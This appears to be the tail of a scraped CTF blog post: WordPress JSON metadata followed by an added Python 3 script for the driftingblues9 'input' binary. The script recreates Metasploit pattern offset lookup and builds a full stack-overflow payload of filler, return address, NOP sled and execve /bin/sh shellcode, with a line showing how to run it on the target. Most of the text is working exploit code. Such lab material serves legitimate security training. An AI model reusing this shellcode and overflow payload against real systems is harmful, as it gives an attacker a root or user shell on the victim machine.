[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,19],"tags":[],"class_list":["post-548","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/548","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=548"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/548\/revisions"}],"predecessor-version":[{"id":549,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/548\/revisions\/549"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=548"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=548"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=548"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
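Added example, not part of the original post or of the referenced writeups: a small Python 3 reimplementation of what pattern_create.rb / pattern_offset.rb did in the offset-finding steps above, plus a builder for the final payload layout the writeup uses (filler, return address, NOP sled, shellcode). The offset 171, the ESP value 0xbf84e7a0 and the 27-byte shellcode bytes are taken from the writeup; the argv NUL-byte check is an addition, because argv[1] is a C string and strcpy would stop at the first NUL.

```python
"""Cyclic-pattern offset lookup and payload assembly for the driftingblues9 `input` overflow.

Added example. Offset 171, the ESP value 0xbf84e7a0 and the shellcode bytes come from
the writeup; the NUL-byte check is new.
"""
import string
import struct
import sys


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1...Zz9), truncated to `length` bytes.

    The 4-byte windows of the pattern do not repeat, which is what lets a crash
    EIP be mapped back to a position in the input.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pack_addr(addr: int) -> bytes:
    """Little-endian 32-bit, the byte order the value has in memory on x86."""
    return struct.pack("<I", addr)


def pattern_offset(eip: int, length: int = 500) -> int:
    """Offset of the bytes that landed in EIP, like `pattern_offset.rb -q <eip>`.

    The register holds 4 pattern bytes read little-endian, so pack the value the
    same way before searching: 0x41376641 becomes b"Af7A".
    """
    idx = cyclic_pattern(length).find(pack_addr(eip))
    if idx < 0:
        raise ValueError(f"{eip:#x} not found in a {length}-byte pattern")
    return idx


# 27-byte NUL-free execve("/bin//sh", NULL, NULL) shellcode used in the final payload.
SHELLCODE = (
    b"\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91"
    b"\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80"
)


def argv_safe(payload: bytes) -> bool:
    """argv strings are C strings: a NUL anywhere truncates what strcpy copies."""
    return b"\x00" not in payload


def build_payload(offset: int, ret_addr: int, nop_len: int = 1000,
                  shellcode: bytes = SHELLCODE) -> bytes:
    """filler | saved-EIP overwrite | NOP sled | shellcode.

    ret_addr is a guess at where ESP points after the ret; any address inside
    the sled works, which is why a large sled is used against a randomized stack.
    """
    payload = b"A" * offset + pack_addr(ret_addr) + b"\x90" * nop_len + shellcode
    if not argv_safe(payload):
        raise ValueError("payload contains a NUL byte; pick a different return address")
    return payload


if __name__ == "__main__":
    # Usage on the target, inside a retry loop as in the writeup:
    #   ./input "$(python3 exploit.py)"
    # Python 3's print() would re-encode the bytes as text, so write them raw.
    sys.stdout.buffer.write(build_payload(pattern_offset(0x41376641), 0xbf84e7a0))
```

The NUL check is the one thing worth keeping from this even when using the one-liners above: a return address such as 0x08040000 packs to bytes containing 0x00, and everything after it would silently never reach the buffer.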